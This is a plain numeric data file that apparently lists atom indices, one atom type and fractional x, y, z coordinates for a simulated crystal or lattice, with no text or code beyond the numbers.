1569 1 -0.00179041 0.626512 0.503961
1574 1 0.187604 0.688748 0.496477
553 1 0.248271 0.119414 0.49558
1638 1 0.181406 0.939375 0.495799
521 1 0.248845 0.997398 0.497308
1134 1 0.436521 0.934922 0.00318348
514 1 0.0639809 0.0624754 0.493387
1033 1 0.251168 0.499266 0.000795641
81 1 0.506075 0.253019 0.00445748
1097 1 0.249724 0.746816 -0.00142485
518 1 0.183962 0.0664155 0.498152
614 1 0.182307 0.431586 0.498387
41 1 0.255728 0.126562 0.000835616
110 1 0.444605 0.432251 -0.00183524
1061 1 0.123987 0.62438 0.0031953
520 1 0.1252 0.0614843 0.555557
547 1 0.0620314 0.117144 0.557257
642 1 0.0695546 0.0614315 0.62409
677 1 0.124684 0.123272 0.622116
1700 1 0.00101246 0.686352 0.689902
2032 1 0.382164 0.938479 0.932941
2030 1 0.438879 0.93587 0.870083
772 1 0.000769592 0.0639141 0.80914
524 1 0.249243 0.0578783 0.564704
551 1 0.186384 0.121689 0.562887
555 1 0.309132 0.119411 0.56206
646 1 0.185935 0.0632394 0.628386
650 1 0.316229 0.0577595 0.627406
681 1 0.248625 0.11828 0.624511
523 1 0.31149 0.999273 0.561799
516 1 0.00543394 0.0619777 0.558973
649 1 0.256109 0.998104 0.622261
528 1 0.370896 0.0623663 0.558815
559 1 0.439948 0.120926 0.564551
654 1 0.437496 0.060425 0.626761
685 1 0.37294 0.121981 0.62437
653 1 0.373905 0.996316 0.623087
552 1 0.128424 0.188985 0.558243
579 1 0.0658063 0.254733 0.562862
584 1 0.123058 0.315951 0.563262
674 1 0.069042 0.184711 0.617286
706 1 0.0632727 0.309538 0.627352
709 1 0.126787 0.247377 0.623286
2029 1 0.373736 0.871884 0.878657
1668 1 -0.00322596 0.556349 0.687148
556 1 0.248287 0.182616 0.565385
583 1 0.191475 0.250634 0.562061
587 1 0.312262 0.254455 0.563499
588 1 0.25086 0.319155 0.559572
678 1 0.182991 0.185403 0.626886
682 1 0.310511 0.190577 0.624665
710 1 0.183807 0.310926 0.629449
713 1 0.246675 0.252406 0.626801
714 1 0.30826 0.312735 0.626267
721 1 0.499692 0.251525 0.627053
1602 1 0.0634611 0.815875 0.501439
560 1 0.374148 0.182946 0.561241
591 1 0.438979 0.251241 0.564756
592 1 0.37642 0.314363 0.564962
686 1 0.43576 0.189289 0.628774
717 1 0.377889 0.248524 0.625526
718 1 0.438718 0.311342 0.625345
2031 1 0.437497 0.873803 0.934551
1972 1 0.5019 0.691596 0.935257
1542 1 0.190403 0.560185 0.501972
1122 1 0.0643881 0.938714 0.995185
1577 1 0.249501 0.622202 0.493308
611 1 0.0647631 0.381704 0.563061
616 1 0.124809 0.44203 0.564227
738 1 0.067576 0.435805 0.624297
741 1 0.120532 0.369286 0.626147
1539 1 0.0614148 0.496667 0.5546
785 1 0.496098 0.00729805 0.755923
615 1 0.183843 0.369891 0.562052
619 1 0.31387 0.375183 0.560677
620 1 0.246567 0.434126 0.561779
742 1 0.187952 0.435324 0.62375
745 1 0.250269 0.375017 0.62337
746 1 0.307137 0.437961 0.625603
1547 1 0.310666 0.493485 0.564088
1637 1 0.120413 0.877746 0.498637
1841 1 0.500554 0.617498 0.74947
1034 1 0.315394 0.565924 1.00062
586 1 0.313461 0.314567 0.500037
623 1 0.439689 0.3762 0.554473
624 1 0.378293 0.433515 0.562361
749 1 0.376815 0.37412 0.625711
750 1 0.441483 0.433155 0.623068
1551 1 0.440196 0.497052 0.562824
1545 1 0.247598 0.500915 0.503279
1677 1 0.377979 0.496442 0.618921
5 1 0.125092 -0.00122863 0.999796
2001 1 0.500095 0.751921 0.868954
2028 1 0.253593 0.938916 0.939473
1620 1 0.498964 0.808977 0.564461
2033 1 0.49929 0.87612 0.874744
1669 1 0.126548 0.49681 0.625604
1544 1 0.121288 0.558284 0.565014
1571 1 0.0649863 0.622401 0.559259
1666 1 0.066144 0.566567 0.626786
1701 1 0.127124 0.63037 0.621908
529 1 0.496955 0.99654 0.500628
1921 1 0.00747398 0.495076 0.87411
2022 1 0.191032 0.94071 0.881071
2023 1 0.185459 0.8737 0.931692
1543 1 0.18956 0.496925 0.564153
1673 1 0.246998 0.496656 0.625166
1548 1 0.246164 0.563319 0.567943
1575 1 0.189166 0.627398 0.555903
1579 1 0.311763 0.625529 0.56077
1670 1 0.183615 0.564274 0.625936
1674 1 0.313972 0.562675 0.62347
1705 1 0.253001 0.631474 0.623704
913 1 0.502791 -0.000818464 0.873867
1101 1 0.372137 0.745685 0.998709
2026 1 0.315568 0.938672 0.876853
1552 1 0.373497 0.56169 0.563755
1583 1 0.442366 0.622568 0.557136
1678 1 0.440243 0.558172 0.628136
1709 1 0.38304 0.619133 0.62553
69 1 0.125565 0.250724 0.999599
1956 1 -0.000383628 0.682693 0.942352
1576 1 0.121276 0.686595 0.554888
1603 1 0.0612514 0.75145 0.56451
1608 1 0.119952 0.815358 0.562637
1698 1 0.0618077 0.685391 0.621662
1730 1 0.0621077 0.813463 0.627909
1733 1 0.12351 0.746574 0.624574
2025 1 0.254117 0.872117 0.881552
1889 1 0.00289885 0.8733 0.749938
1580 1 0.246303 0.686729 0.560345
1607 1 0.182497 0.749602 0.561968
1611 1 0.312015 0.747644 0.561952
1612 1 0.249163 0.811222 0.561529
1702 1 0.18781 0.684923 0.62066
1706 1 0.315301 0.684025 0.619984
1734 1 0.191343 0.812623 0.623524
1737 1 0.250353 0.748512 0.619576
1738 1 0.313558 0.810855 0.625193
38 1 0.188321 0.181934 0.998308
1828 1 -0.000513273 0.685702 0.819317
618 1 0.306673 0.436612 0.497459
2036 1 0.495081 0.938197 0.934182
2027 1 0.314586 0.873128 0.941012
903 1 0.190126 0.00398837 0.936317
1584 1 0.376808 0.688728 0.564426
1615 1 0.435037 0.755162 0.5658
1616 1 0.371832 0.81082 0.564382
1710 1 0.439745 0.682303 0.631958
1741 1 0.376171 0.745633 0.628114
1742 1 0.432461 0.812463 0.625196
1745 1 0.496975 0.752634 0.625064
549 1 0.123384 0.12405 0.497774
515 1 0.0658499 0.00152715 0.558977
645 1 0.126165 -0.00134032 0.624454
1635 1 0.0614402 0.873821 0.56618
1640 1 0.123325 0.933014 0.564167
1762 1 0.0631879 0.936491 0.62538
1765 1 0.127916 0.879116 0.625718
899 1 0.0641856 0.00329544 0.932782
1844 1 0.496915 0.687471 0.812969
78 1 0.439879 0.31461 0.997363
519 1 0.179943 0.996041 0.56107
1639 1 0.19275 0.875621 0.56564
1643 1 0.312943 0.872063 0.565332
1644 1 0.251443 0.939321 0.563903
1766 1 0.189092 0.94488 0.63143
1769 1 0.25143 0.871309 0.628565
1770 1 0.311967 0.933079 0.622045
1609 1 0.247552 0.747915 0.497445
2021 1 0.120144 0.88256 0.874696
527 1 0.434637 1.00254 0.560988
1647 1 0.435411 0.871619 0.561278
1648 1 0.371687 0.933975 0.55749
1773 1 0.372113 0.869834 0.626625
1774 1 0.437131 0.937785 0.622254
648 1 0.128144 0.060344 0.689507
675 1 0.0658383 0.123003 0.687604
770 1 0.0649177 0.0584914 0.749177
776 1 0.129528 0.0639422 0.814545
803 1 0.0627353 0.123328 0.813568
805 1 0.124035 0.122701 0.756365
2004 1 0.500024 0.806016 0.935548
652 1 0.252486 0.0627011 0.693495
679 1 0.189165 0.124869 0.687546
683 1 0.311096 0.12053 0.685537
774 1 0.185466 0.0635735 0.751981
778 1 0.318642 0.0637514 0.747924
780 1 0.251565 0.0682328 0.804002
807 1 0.187824 0.127145 0.818492
809 1 0.256308 0.132971 0.75025
811 1 0.313425 0.128423 0.812978
651 1 0.311877 1.00376 0.689711
775 1 0.188251 1.00088 0.812737
656 1 0.374677 0.0598313 0.684786
687 1 0.43767 0.129643 0.685866
782 1 0.434758 0.0684076 0.748523
784 1 0.374975 0.0638139 0.809596
813 1 0.379181 0.129412 0.749224
815 1 0.437811 0.131277 0.813431
655 1 0.438101 0.999534 0.683654
781 1 0.378789 0.000257986 0.753879
2024 1 0.122624 0.94071 0.936278
2018 1 0.0634879 0.941297 0.874987
2019 1 0.0635621 0.876498 0.934276
680 1 0.125075 0.183995 0.68791
707 1 0.0617235 0.245558 0.68734
712 1 0.124222 0.30845 0.687831
802 1 0.058063 0.187908 0.754036
808 1 0.120604 0.185896 0.815781
834 1 0.0655173 0.310641 0.751144
835 1 0.0638357 0.250911 0.812259
837 1 0.124285 0.245025 0.751237
840 1 0.128938 0.310005 0.811305
74 1 0.314128 0.31754 0.998792
684 1 0.24331 0.185909 0.688476
711 1 0.177855 0.247423 0.691821
715 1 0.314849 0.251358 0.685957
716 1 0.248559 0.314482 0.688561
806 1 0.182076 0.18509 0.756064
810 1 0.314632 0.194219 0.751943
812 1 0.251294 0.19536 0.808977
838 1 0.193888 0.310782 0.75041
839 1 0.186394 0.250827 0.813107
841 1 0.250045 0.24792 0.746821
842 1 0.310415 0.318716 0.749517
843 1 0.310144 0.253408 0.814508
844 1 0.25293 0.312187 0.81184
688 1 0.371408 0.185408 0.686972
719 1 0.441456 0.252327 0.687947
720 1 0.377403 0.312806 0.687223
814 1 0.437544 0.191535 0.749737
816 1 0.379531 0.191721 0.809123
845 1 0.373657 0.257614 0.746037
846 1 0.437825 0.316792 0.748212
847 1 0.440331 0.250742 0.8137
848 1 0.380056 0.309283 0.812902
901 1 0.128005 1.002 0.87877
689 1 0.502466 0.127875 0.629971
739 1 0.0590572 0.372999 0.685292
744 1 0.125998 0.435789 0.686343
866 1 0.0630369 0.435272 0.744382
867 1 0.0661926 0.370599 0.816054
869 1 0.126378 0.375738 0.749024
872 1 0.125712 0.435658 0.816784
1795 1 0.0673327 0.493409 0.813619
1667 1 0.0658716 0.497613 0.686039
1797 1 0.125086 0.501089 0.752967
788 1 0.494573 0.0655753 0.815541
743 1 0.185363 0.369822 0.685931
747 1 0.311593 0.373152 0.685958
748 1 0.248053 0.438257 0.6876
870 1 0.186172 0.440431 0.752426
871 1 0.190672 0.374886 0.811558
873 1 0.246638 0.377787 0.744758
874 1 0.311009 0.433426 0.747932
875 1 0.313853 0.372448 0.812982
876 1 0.249846 0.441052 0.814486
1671 1 0.18509 0.49641 0.690037
1968 1 0.376138 0.689756 0.932822
751 1 0.435219 0.37501 0.685503
752 1 0.373261 0.433558 0.682414
877 1 0.376586 0.378119 0.750996
878 1 0.442056 0.440662 0.749711
879 1 0.434425 0.378142 0.812494
880 1 0.37375 0.436949 0.812714
1679 1 0.441082 0.497717 0.683315
1805 1 0.380133 0.49615 0.742611
1966 1 0.439915 0.683673 0.875231
1672 1 0.129863 0.556937 0.687069
1699 1 0.0679603 0.626171 0.684144
1794 1 0.0608389 0.559489 0.747781
1800 1 0.124687 0.565789 0.815442
1827 1 0.0611083 0.626375 0.814135
1829 1 0.124351 0.622965 0.75111
1803 1 0.313956 0.499045 0.805342
1675 1 0.315422 0.499847 0.679389
1801 1 0.24954 0.498486 0.745632
1799 1 0.183453 0.50165 0.814458
1676 1 0.24704 0.560233 0.682967
1703 1 0.182789 0.624701 0.683993
1707 1 0.310272 0.621649 0.680478
1798 1 0.192547 0.561008 0.747299
1802 1 0.313432 0.559943 0.736448
1804 1 0.255885 0.559547 0.804673
1831 1 0.188803 0.620465 0.812385
1833 1 0.252584 0.621464 0.744144
1835 1 0.31339 0.623473 0.808585
1807 1 0.444045 0.496419 0.812799
1680 1 0.375743 0.557727 0.687213
1711 1 0.434572 0.618982 0.692617
1806 1 0.438702 0.556047 0.752676
1808 1 0.374728 0.558782 0.811723
1837 1 0.369941 0.623853 0.749582
1839 1 0.442174 0.625764 0.813109
1098 1 0.311401 0.810499 1.00112
2000 1 0.370608 0.807447 0.937775
1998 1 0.439687 0.810809 0.873357
1997 1 0.372108 0.74922 0.873494
1704 1 0.124216 0.688792 0.689716
1731 1 0.0610832 0.74718 0.68525
1736 1 0.127672 0.816897 0.687367
1826 1 0.0660012 0.686859 0.748803
1832 1 0.120691 0.686161 0.812593
1858 1 0.06687 0.815638 0.749184
1859 1 0.060878 0.755193 0.811528
1861 1 0.123573 0.750358 0.751073
1864 1 0.125723 0.814094 0.815879
1708 1 0.249107 0.687188 0.689129
1735 1 0.18336 0.75312 0.687098
1739 1 0.308805 0.749167 0.684725
1740 1 0.25103 0.812255 0.688481
1830 1 0.183798 0.679317 0.749402
1834 1 0.311282 0.683835 0.744492
1836 1 0.246313 0.685096 0.807236
1862 1 0.185159 0.815209 0.751692
1863 1 0.184277 0.746929 0.812556
1865 1 0.256086 0.753628 0.753478
1866 1 0.315212 0.812857 0.749824
1867 1 0.316363 0.754449 0.818707
1868 1 0.24399 0.812049 0.812279
1999 1 0.438136 0.749902 0.936928
1712 1 0.376723 0.678836 0.686753
1743 1 0.437488 0.752592 0.686741
1744 1 0.377647 0.807766 0.690475
1838 1 0.443063 0.683938 0.748302
1840 1 0.378601 0.687034 0.810061
1869 1 0.374412 0.748409 0.749611
1870 1 0.43531 0.810878 0.751591
1871 1 0.436487 0.749059 0.813649
1872 1 0.374771 0.816162 0.811894
1094 1 0.184275 0.813751 1.00006
1037 1 0.377651 0.500212 1.0059
643 1 0.0627477 0.999088 0.684968
771 1 0.0622834 0.00176828 0.81241
773 1 0.128141 1.00016 0.749953
1763 1 0.064928 0.876625 0.689129
1768 1 0.128783 0.940735 0.688995
1890 1 0.0643719 0.94109 0.748633
1891 1 0.0636711 0.875622 0.81075
1893 1 0.124011 0.875721 0.751191
1896 1 0.122063 0.940665 0.812498
1924 1 -9.15941e-05 0.558299 0.938115
777 1 0.253906 1.00259 0.751776
779 1 0.315163 -4.91504e-05 0.81568
647 1 0.192497 -0.0018102 0.690699
1767 1 0.186667 0.874582 0.686758
1771 1 0.315797 0.872878 0.683573
1772 1 0.255723 0.937383 0.691268
1894 1 0.186952 0.93287 0.753131
1895 1 0.188184 0.878345 0.822254
1897 1 0.248833 0.874148 0.751524
1898 1 0.309811 0.934713 0.757969
1899 1 0.311599 0.871811 0.814511
1900 1 0.252106 0.93861 0.816369
783 1 0.439167 0.00265187 0.812783
1775 1 0.439821 0.87562 0.684281
1776 1 0.375032 0.936154 0.688809
1901 1 0.377669 0.876218 0.753351
1902 1 0.443638 0.936719 0.745094
1903 1 0.442777 0.875933 0.810228
1904 1 0.375997 0.935555 0.811775
1652 1 0.496284 0.942102 0.567092
641 1 0.00583405 -0.000729188 0.626502
898 1 0.0656409 0.0613879 0.872653
904 1 0.128965 0.0615661 0.936436
931 1 0.0646859 0.125792 0.939081
933 1 0.123158 0.1227 0.877064
66 1 0.0667541 0.318446 1.00308
1553 1 0.496333 0.497818 0.495367
905 1 0.252212 -0.000515712 0.873837
907 1 0.316797 0.00256747 0.937643
902 1 0.192867 0.0579331 0.87141
906 1 0.30993 0.0578507 0.873908
908 1 0.255848 0.0661966 0.941086
935 1 0.188536 0.126679 0.934543
937 1 0.255764 0.12635 0.869793
939 1 0.313528 0.128651 0.935081
817 1 0.49848 0.122159 0.747947
1954 1 0.0628528 0.686256 0.880316
911 1 0.44012 -0.00062172 0.936532
1992 1 0.128489 0.803033 0.940007
909 1 0.377323 -0.000555195 0.880394
910 1 0.435144 0.0662903 0.872931
912 1 0.374392 0.0644014 0.932288
941 1 0.373501 0.120075 0.868099
943 1 0.43519 0.121372 0.937937
1989 1 0.122644 0.746169 0.872713
1987 1 0.0566181 0.751223 0.936875
993 1 0.002283 0.375032 0.873466
1825 1 0.00831613 0.621926 0.74935
930 1 0.057479 0.186685 0.875131
936 1 0.124741 0.197046 0.937448
962 1 0.0625304 0.309159 0.87567
963 1 0.0634229 0.253453 0.939809
965 1 0.122379 0.252331 0.875638
968 1 0.125329 0.312801 0.938262
1962 1 0.313662 0.683625 0.869927
596 1 0.50317 0.310605 0.557573
1777 1 0.500341 0.874694 0.619993
1990 1 0.190841 0.803354 0.879944
545 1 0.000210539 0.125893 0.500407
934 1 0.182126 0.191902 0.875103
938 1 0.31078 0.191278 0.87352
940 1 0.252625 0.193488 0.93802
966 1 0.186174 0.310545 0.876022
967 1 0.186962 0.248848 0.942272
969 1 0.248885 0.253433 0.872793
970 1 0.311417 0.310923 0.876214
971 1 0.318257 0.253325 0.933843
972 1 0.249684 0.313198 0.933435
628 1 0.499814 0.43959 0.563793
1986 1 0.0679391 0.817274 0.881029
644 1 -0.00413542 0.059809 0.685675
1764 1 -0.00239757 0.935258 0.689887
564 1 0.496008 0.188126 0.560233
973 1 0.37734 0.246656 0.872191
944 1 0.379304 0.187944 0.939822
942 1 0.437963 0.189432 0.876325
976 1 0.377693 0.317216 0.939963
975 1 0.445605 0.251 0.935826
974 1 0.43981 0.315061 0.876877
1933 1 0.376676 0.493609 0.872272
1964 1 0.251253 0.684854 0.930565
995 1 0.065405 0.372423 0.933533
1000 1 0.131195 0.440757 0.937235
994 1 0.0623419 0.437682 0.876508
997 1 0.129821 0.376075 0.877737
1070 1 0.439844 0.685526 1.00024
1996 1 0.244597 0.810608 0.942471
998 1 0.188776 0.438275 0.875176
1001 1 0.247382 0.373357 0.869666
999 1 0.190468 0.374702 0.932058
1004 1 0.251272 0.438337 0.932547
1002 1 0.313205 0.432893 0.875032
1003 1 0.311337 0.377111 0.938028
1927 1 0.195429 0.499868 0.934253
1960 1 0.126727 0.691984 0.939132
1 1 0.00436475 -0.00241054 0.995194
1935 1 0.442247 0.498514 0.940102
1934 1 0.441526 0.557328 0.87553
1993 1 0.252614 0.743656 0.872804
1965 1 0.37562 0.620681 0.877935
1991 1 0.191553 0.745422 0.93741
109 1 0.380828 0.378579 0.998134
1008 1 0.38016 0.436389 0.938704
1007 1 0.441756 0.374978 0.937109
1005 1 0.374192 0.375073 0.87169
1006 1 0.439812 0.434921 0.874401
1995 1 0.311004 0.746776 0.936522
1925 1 0.1211 0.500347 0.877627
1923 1 0.0637427 0.497157 0.940242
1922 1 0.0625044 0.559499 0.876071
1928 1 0.123482 0.558739 0.940673
1955 1 0.0644578 0.617384 0.941844
1957 1 0.127067 0.627237 0.871958
1994 1 0.306606 0.811408 0.883031
1963 1 0.316981 0.62152 0.934884
1961 1 0.254675 0.622994 0.869286
1932 1 0.257294 0.56127 0.934142
1931 1 0.315863 0.493316 0.93957
1959 1 0.185295 0.627024 0.93562
1929 1 0.248636 0.498787 0.871531
1926 1 0.187637 0.563845 0.882306
1930 1 0.312421 0.554027 0.870825
1967 1 0.443323 0.624893 0.932696
1936 1 0.370298 0.558216 0.938878
1958 1 0.186658 0.683648 0.874892
1713 1 0.49757 0.616914 0.624328
1892 1 -0.00184886 0.938747 0.809186
532 1 0.500031 0.0575155 0.558523
945 1 0.500772 0.125648 0.878398
868 1 0.0040553 0.43254 0.80903
580 1 0.000708972 0.313294 0.563444
1684 1 0.501952 0.557779 0.687804
1572 1 -0.000500131 0.691335 0.562045
1860 1 0.00188093 0.816538 0.812663
1988 1 0.00372531 0.813429 0.935963
1953 1 0.00363215 0.624622 0.877699
961 1 -0.00342324 0.24952 0.878047
820 1 0.503476 0.182313 0.817508
929 1 -0.00448578 0.127354 0.876885
900 1 -0.00396885 0.0639565 0.935706
1857 1 0.0077197 0.753349 0.747233
660 1 0.493946 0.0625243 0.686755
1793 1 0.0047145 0.495927 0.746367
1646 1 0.435662 0.937587 0.497279
1062 1 0.191883 0.685639 0.998671
1133 1 0.374119 0.875547 0.996237
561 1 0.497688 0.124364 0.50119
98 1 0.0642239 0.436234 1.00015
1029 1 0.128821 0.500517 1.00361
1065 1 0.250203 0.618174 0.995509
105 1 0.249247 0.37787 0.999124
1069 1 0.379797 0.623686 0.992217
550 1 0.194661 0.186846 0.501945
1038 1 0.441785 0.563918 0.997964
1026 1 0.0671187 0.557065 1.0065
34 1 0.0665448 0.188376 1.00363
102 1 0.190836 0.439952 1.00093
70 1 0.184921 0.313895 0.996719
2 1 0.0637328 0.0622296 0.997802
1610 1 0.309213 0.812236 0.500618
610 1 0.0617435 0.438763 0.497906
1634 1 0.0625082 0.941941 0.503477
546 1 0.0644266 0.186581 0.506098
1126 1 0.186882 0.933918 0.994815
1614 1 0.441367 0.812064 0.49812
1582 1 0.4429 0.690711 0.501556
1025 1 0.00243718 0.496597 0.999772
1642 1 0.306481 0.932868 0.499309
14 1 0.437802 0.0577394 0.997652
1066 1 0.310036 0.681924 0.995108
1578 1 0.312167 0.685176 0.494693
1550 1 0.433493 0.558617 0.503146
37 1 0.127922 0.121828 0.99816
101 1 0.129734 0.375202 0.997699
1030 1 0.184218 0.563112 1.00199
577 1 -0.00212934 0.244826 0.502702
1137 1 0.496396 0.875431 0.999107
1102 1 0.440556 0.815455 0.99997
609 1 -0.00116001 0.379188 0.501298
1125 1 0.124189 0.873875 0.995099
1549 1 0.375342 0.499072 0.503484
6 1 0.19694 0.0674476 0.996059
517 1 0.125504 0.00435885 0.49665
1546 1 0.31015 0.561599 0.507038
24 1 0.626399 0.0573837 0.0620094
51 1 0.569128 0.123393 0.0632087
146 1 0.561952 0.0651107 0.127877
181 1 0.626327 0.122176 0.122112
121 1 0.747134 0.375143 -0.00464349
18 1 0.560791 0.0655138 0.00158793
19 1 0.567621 0.997209 0.0621821
28 1 0.75148 0.0641966 0.0647518
55 1 0.692542 0.120706 0.0623231
59 1 0.810665 0.126596 0.063853
150 1 0.690125 0.0594092 0.128109
154 1 0.809862 0.0581578 0.125649
185 1 0.747725 0.127995 0.131601
153 1 0.751709 0.998759 0.133326
23 1 0.687474 1.00078 0.0638551
260 1 1.00127 0.0647922 0.314466
36 1 1.00096 0.182041 0.0592992
32 1 0.872741 0.0637825 0.0606589
63 1 0.935846 0.124073 0.0650631
158 1 0.935715 0.0623437 0.124332
189 1 0.870769 0.123871 0.126185
157 1 0.874158 -0.00109471 0.119846
1492 1 0.504118 0.812252 0.436539
31 1 0.941162 0.998157 0.0582881
56 1 0.625941 0.190568 0.0675596
83 1 0.560225 0.249685 0.0709225
88 1 0.626287 0.316939 0.0644042
178 1 0.566142 0.189259 0.133365
210 1 0.564529 0.314105 0.127352
213 1 0.626413 0.253021 0.132879
1536 1 0.872164 0.939144 0.441238
449 1 0.998967 0.2439 0.371248
20 1 0.500967 0.0603355 0.0611252
1535 1 0.938574 0.873295 0.43828
60 1 0.75152 0.191677 0.067389
87 1 0.686276 0.252742 0.0679084
91 1 0.811584 0.252902 0.0645685
92 1 0.747356 0.308827 0.0662207
182 1 0.68967 0.192822 0.129438
186 1 0.808864 0.187231 0.123336
214 1 0.686486 0.319176 0.132663
217 1 0.749654 0.250111 0.132529
218 1 0.812716 0.313058 0.129589
116 1 0.498315 0.437946 0.0670291
289 1 1.0012 0.122863 0.252484
1049 1 0.750592 0.494831 -0.000278839
64 1 0.871194 0.182681 0.068798
95 1 0.936523 0.242788 0.0708239
96 1 0.87915 0.315597 0.0640727
190 1 0.940601 0.179758 0.129022
221 1 0.874443 0.247053 0.127375
222 1 0.938344 0.314722 0.124155
126 1 0.940549 0.440688 -0.00584294
337 1 0.499266 0.259721 0.255032
53 1 0.626557 0.123389 0.00283229
115 1 0.564066 0.38222 0.061024
120 1 0.627999 0.44224 0.0637311
242 1 0.56656 0.438885 0.128978
245 1 0.625999 0.374625 0.128706
1173 1 0.62977 0.502677 0.125671
119 1 0.687136 0.379375 0.063297
123 1 0.811731 0.370608 0.0596388
124 1 0.751973 0.439314 0.0664706
246 1 0.691414 0.435713 0.126975
249 1 0.753198 0.371848 0.125352
250 1 0.812756 0.431806 0.125983
1047 1 0.689587 0.500318 0.0689718
1561 1 0.750699 0.499362 0.5044
127 1 0.936279 0.376923 0.0558252
128 1 0.872876 0.436011 0.060464
253 1 0.873533 0.374079 0.127734
254 1 0.935464 0.435373 0.12306
1534 1 0.938435 0.947133 0.378054
1043 1 0.560857 0.502843 0.0616467
1048 1 0.624805 0.561807 0.0650246
1075 1 0.56369 0.620688 0.0650105
1170 1 0.561483 0.561674 0.128812
1205 1 0.632945 0.627039 0.122394
89 1 0.752108 0.248007 0.00119117
1051 1 0.815899 0.499205 0.0699382
1177 1 0.753016 0.49875 0.12346
1052 1 0.746027 0.562174 0.0632045
1079 1 0.687681 0.626921 0.0642752
1083 1 0.812019 0.625144 0.0619209
1174 1 0.688241 0.564369 0.124893
1178 1 0.812419 0.561752 0.128513
1209 1 0.7495 0.626379 0.12455
1105 1 0.500748 0.748029 -0.000474966
598 1 0.688593 0.311383 0.502429
30 1 0.941167 0.0630112 -6.47857e-05
1181 1 0.882246 0.499666 0.123565
1055 1 0.939488 0.494432 0.0609133
1056 1 0.876927 0.558049 0.0627759
1087 1 0.941936 0.626067 0.0633304
1182 1 0.938323 0.554363 0.127973
1213 1 0.876933 0.621234 0.123099
1533 1 0.875767 0.878181 0.376209
1053 1 0.87603 0.503417 0.00284468
1149 1 0.876159 0.876313 0.00210626
22 1 0.685798 0.0655557 -0.000597379
1364 1 0.498441 0.812949 0.309874
1080 1 0.627009 0.687896 0.0668721
1107 1 0.564198 0.749335 0.0661631
1112 1 0.624278 0.813019 0.0635718
1202 1 0.562684 0.691889 0.128063
1234 1 0.562453 0.820092 0.129344
1237 1 0.62981 0.753055 0.126427
465 1 0.503834 0.250517 0.377166
84 1 0.499112 0.312148 0.0631002
1537 1 0.995842 0.49859 0.493157
1084 1 0.751238 0.684951 0.057661
1111 1 0.686711 0.75061 0.0671969
1115 1 0.815331 0.749606 0.0657126
1116 1 0.753793 0.805134 0.0645913
1206 1 0.68759 0.688848 0.12561
1210 1 0.809828 0.685595 0.121423
1238 1 0.691506 0.815457 0.122813
1241 1 0.750402 0.746865 0.126272
1242 1 0.816504 0.809113 0.130981
212 1 0.504838 0.31512 0.183909
637 1 0.878332 0.376708 0.498344
90 1 0.814058 0.310888 0.00203436
1088 1 0.875141 0.685287 0.0659761
1119 1 0.942222 0.751437 0.0601177
1120 1 0.875243 0.815143 0.0679469
1214 1 0.936526 0.689404 0.124881
1245 1 0.876961 0.75139 0.124961
1246 1 0.937681 0.812435 0.125173
407 1 0.690365 0.00416773 0.43904
149 1 0.627509 0.999859 0.125985
1139 1 0.555724 0.876777 0.0587742
1144 1 0.626344 0.934276 0.0630045
1266 1 0.565858 0.934227 0.123201
1269 1 0.625854 0.873164 0.127484
420 1 0.997661 0.189904 0.438993
177 1 0.499892 0.124136 0.121665
50 1 0.558885 0.188503 -0.00183613
1532 1 0.749237 0.942934 0.438125
468 1 0.503894 0.316023 0.435197
1412 1 0.995999 0.562911 0.435046
27 1 0.805684 0.0020473 0.0579308
1143 1 0.6862 0.873127 0.0624444
1147 1 0.811813 0.87246 0.0636943
1148 1 0.748896 0.936742 0.0598553
1270 1 0.689207 0.937451 0.124815
1273 1 0.75261 0.876919 0.124818
1274 1 0.816338 0.93598 0.124011
62 1 0.929887 0.184326 0.00225384
436 1 0.498285 0.190925 0.440001
1089 1 1.0043 0.750887 0.00110582
225 1 0.998286 0.373808 0.124073
1151 1 0.939448 0.877288 0.0647018
1152 1 0.874055 0.938479 0.0574861
1277 1 0.877001 0.876588 0.130924
1278 1 0.939212 0.937828 0.123423
1531 1 0.811773 0.872399 0.442003
1530 1 0.815692 0.935998 0.370798
152 1 0.626527 0.0646744 0.185552
179 1 0.562604 0.127133 0.184483
274 1 0.55994 0.0607368 0.24737
280 1 0.624229 0.0641817 0.315419
307 1 0.558075 0.124656 0.31255
309 1 0.619585 0.125554 0.248222
277 1 0.623903 0.00155706 0.251003
147 1 0.566657 -0.00708448 0.18413
156 1 0.747393 0.0650819 0.187682
183 1 0.681318 0.125598 0.189112
187 1 0.812724 0.12481 0.187469
278 1 0.681987 0.0578485 0.25069
282 1 0.810175 0.0570482 0.244455
284 1 0.743005 0.064281 0.313457
311 1 0.683918 0.121742 0.31048
313 1 0.746081 0.125577 0.25012
315 1 0.813855 0.124746 0.312645
281 1 0.743419 -0.00163245 0.249864
283 1 0.811966 0.00988793 0.31442
151 1 0.686569 0.994615 0.187699
1529 1 0.752064 0.885585 0.378473
160 1 0.873094 0.0583237 0.183269
191 1 0.940276 0.120001 0.188919
286 1 0.935403 0.0609867 0.250638
288 1 0.871732 0.0636187 0.314754
317 1 0.878297 0.117543 0.247656
319 1 0.94055 0.124761 0.312327
285 1 0.875682 1.00398 0.250372
159 1 0.936573 0.998677 0.188263
1527 1 0.687548 0.8803 0.439749
184 1 0.623357 0.19094 0.190932
211 1 0.557477 0.254581 0.191985
216 1 0.62441 0.313523 0.192085
306 1 0.562656 0.192125 0.250491
312 1 0.617915 0.189762 0.310203
338 1 0.567204 0.313978 0.25679
339 1 0.562825 0.252283 0.31273
341 1 0.626044 0.251465 0.25013
344 1 0.634351 0.313854 0.310816
1526 1 0.683496 0.943375 0.37458
209 1 0.495059 0.245963 0.124139
188 1 0.749056 0.188543 0.18898
215 1 0.68662 0.250302 0.193292
219 1 0.813533 0.249404 0.187642
220 1 0.754578 0.314291 0.189746
310 1 0.687238 0.185585 0.255127
314 1 0.811393 0.186446 0.249862
316 1 0.750716 0.191159 0.313574
342 1 0.695194 0.3167 0.247933
343 1 0.687677 0.249811 0.314641
345 1 0.749955 0.24828 0.247321
346 1 0.816086 0.314364 0.24951
347 1 0.813691 0.252189 0.309905
348 1 0.750108 0.312268 0.310734
1566 1 0.937206 0.5645 0.497417
192 1 0.872576 0.184583 0.185538
223 1 0.930222 0.247659 0.184436
224 1 0.873957 0.315106 0.18587
318 1 0.93404 0.184579 0.246518
320 1 0.872808 0.18723 0.312327
349 1 0.871422 0.245333 0.246785
350 1 0.932937 0.307128 0.249369
351 1 0.932197 0.249593 0.310561
352 1 0.873114 0.312677 0.313165
500 1 0.49818 0.438073 0.433481
405 1 0.618308 1.00107 0.376128
403 1 0.56116 1.00065 0.436654
243 1 0.565488 0.370796 0.194017
248 1 0.623906 0.435321 0.194627
370 1 0.561381 0.442843 0.250657
371 1 0.562229 0.376432 0.314919
